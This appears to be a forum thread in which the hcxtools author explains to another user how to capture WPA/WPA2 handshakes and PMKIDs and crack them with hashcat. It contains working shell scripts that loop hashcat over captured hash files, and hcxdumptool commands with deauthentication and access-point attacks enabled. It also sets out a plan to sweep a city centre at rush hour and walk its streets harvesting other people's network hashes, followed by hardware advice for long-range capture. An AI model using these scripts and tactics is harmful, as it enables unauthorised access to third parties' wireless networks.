hcxtools - solution for capturing wlan traffic and conversion to hashcat formats

[ZerBea]

It is important to collect the -E and -I lists to an archive list!
It is important to add collect PMKIDs (.16800) and EAPOLs (hccapx) to archive hash lists!
And it is important to run .16800 archive and hccapx archive at regular intervals against this -E -I list!

BTW:
Please let me know, if you got your first hit.

[powermi]

Thanks, I duplicated the line 1/2 cause as I saw HEX[xxxx] I suspected that could be a PSK, but didn't know that Hashcat could process it as a possible key.
So would it make more sense to convert to .2500 instead .16800 the output file? I'll research more about the difference in between both.
Seems that's a great task for a raspberry to be listening 24/7 with hcxtools.

[ZerBea]

You should do both (convert to .2500 and .16800) and run -E and -I list on them.
But, yes, it make more sense to run -E and -I against .2500

It also depends on what you want. Let's run through the following "theoretical" example:
Capture as much traffic as possible in the city centre on rush hour to get PSKs from clients.
Then do a ride / walk through all the streets and get PMKIDs.
Cat all -z, -o to hash files and -E -I to word list.
Run the word list against the hashes.

Will say:
hcxdumptool/hcxtools offers numerous application possibilities, when running on a Raspberry. See Penetration testing system 1 ... 5:
https://github.com/ZerBea/hcxdumptool/wiki

[ZerBea]

hcxpsktool is a powerful tool in combination with hashcat. To improve speed on large hash files, it should be wrapped by a script:

hash mode 2500:
wlanhcx2ssid -i "$HOME/.....path_to your hashfile.hccapx" -e
for HCXTMP in `find -type f -name "*.hccapx"`
do
ls *.hccapx | wc
hcxpsktool -i "$HCXTMP" -o test.list
hashcat -m 2500 --self-test-disable --advice-disable --logfile-disable -w 3 --nonce-error-corrections=32 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HCXTMP" test.list
rm "$HCXTMP"
rm test.list
done

The same aply to hash mode 16800:
while HASHLINE='' read -r line || [[ -n "$line" ]]
do
HASHNAME=`echo "$line" | awk 'BEGIN { FS = ":" } ; { print $4 }'`
echo "$line" >> "$HASHNAME.16800"
done < "$HOME/.....path_to your hashfile .16800"
for HCXTMP in `find -type f -name "*.16800"`
do
ls *.16800 | wc
hcxpsktool -z "$HCXTMP" > test.list
hashcat -m 16800 --self-test-disable --advice-disable --logfile-disable -w 3 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HCXTMP" test.list
rm "$HCXTMP"
rm test.list
done

A good idea is to mkdir a folder and run the scripts inside the folder.
If you have small GPU power, it is a good idea to sort | unique "test.list", before feeding it to hashcat.

[ZerBea]

hcxwltool is also a powerful tool in combination with hashcat. It is designed to run on -E and -I output of hcxpcaptool and can be wrapped by a script, too:

In this example we also expect PSKs of length 10 digit.
hash mode 2500 (it will work on hash mode 16800, too):
hcxwltool -i "$HOME/...path to your -E / -I list" --straight > l1.tmp
hcxwltool -i "$HOME/...path to your -E / -I list" --digit >> l1.tmp
hcxwltool -i "$HOME/...path to your -E / -I list" --digit --length=10 >> l1.tmp
hcxwltool -i "$HOME/...path to your -E / -I list" --xdigit >> l1.tmp
sort l1.tmp | uniq > test.list
rm l1.tmp
hashcat -m 2500 --self-test-disable --advice-disable --logfile-disable -w 3 --nonce-error-corrections=32 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HOME/.....path_to your hashfile.hccapx " test.list
rm test.list

[powermi]

thanks a lot for that great info. So, could you elaborate your full attack strategy for breaking PMKID captures on a new environment being located just on one spot?
Im about to purchase a Raspberry Pi just for HCXTools, better to go for a zero or a full B3+?
I wanna grab also an antenna to use it along a TPLink 722n.

[ZerBea]

1) capture traffic:
new area:
hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --give_up_ap_attacks=100000 --give_up_deauthentications=100000

discovered area:
hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --disable_ap_attacks --disable_deauthentications -t 120

2) upload data to wpa-sec:
wlancap2wpasec *.pcapng

3) convert to hasfiles / wordlists or run wlanstrip:
hcxpcaptool -o new.hccapx -k new.16800 -E essidlist -I identitylist -U usernameliste -P pmklist -X clientlist --md5-out=hash.4800 --netntlm=hash.5500 *.*

4) pipe hcxpsktool, hcxwltool output to hashcat and run them against the hashes.
or run hcxallneu (or hcx2500neu or hcx16800neu

5) wait until wpa-sec finished, download cracked.txt and rkg.txt and run them against your hashes

6) loop into 1 to capture new traffic


Attached the scipts and rules to build up a complete environment. You just need to change the path.
Also you need 2 wordlists (names [namen] and month [monate])


  scripts&rules.zip (Size: 4.98 KB / Downloads: 24)

Don't wonder about the high value of nonce-error-corrections, but I have to analyze really, really ugly cap files.
On hcxdumdptool pcapng files you can set it to 0, 1 or 2.


Unfortunately I have no strategy to break a single network, because I'm not interested in breaking single networks.
Goal is to find a weak point within the system.


BTW:
A Raspberry Zero WH is the best choise. Low power consumption and small size.
Onboard WiFi soc is really, really ugly in combination with hcxdumptool.


Penetration testing systems 3, 4, 5 are line of sight (LOS) systems with extreme long range capabilites.

Do not run a high power WiFi dongle - a hygain antenna in combination with a low power dongle is much better.

[ZerBea]

If you're only interested to run the Raspberry as capture / conversion engine, I recommend to install Arch.
Do not install "K*A*L*I", because it is substantially oversized!

Attached a small howto:

  how_to_Arch.zip (Size: 1.65 KB / Downloads: 9)

More help here:
https://wiki.archlinux.org/index.php/installation_guide

[powermi]

Thanks a lot for the detailed answer. Why do you use -k instead -z to get the .16800? 
Could you describe the different arguments execute on hcxdumptool? Some are unknown for me .
I'm thinking using a regular Debian based distro for raspberry. I'll start with a model B + TPlink722n + 10db panel antenna.

[ZerBea]

-z old hashcat separator * (also used by JtR)
-k new hashcat separator :

hashcat accept both,  because it has a build in fallback to the old format.

The new one is used in potfile and outfile by hashcat.

Some tests (hcxdumptool -i interface --do_rcascan + 10 dBi panel antenna):

TP-LINK TL-WN722N v1
ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n
INFO: cha=6, rx=8476, rx(dropped)=0, tx=250, err=0, aps=29 (19 in range)

TP-LINK Archer T2UH
ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter
INFO: cha=4, rx=5897, rx(dropped)=0, tx=225, err=0, aps=40 (24 in range)

TENDA W311U+
INFO: cha=11, rx=4937, rx(dropped)=0, tx=224, err=0, aps=48 (20 in range)

ALFA AWUS036H
ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
INFO: cha=6, rx=1699, rx(dropped)=0, tx=113, err=0, aps=33 (19 in range)


Unfortunately some other devices are not working (any longer) due to a kernel issue (not fixed, yet):
https://bugzilla.kernel.org/show_bug.cgi?id=202541


BTW:
Only TP-Link TL-WN722N v1 is working like expected
https://wikidevi.com/wiki/TP-LINK_TL-WN722N_v1.x

A panel is a good choice (TP-Link TL-ANT2414A and TL-ANT2409A working fine).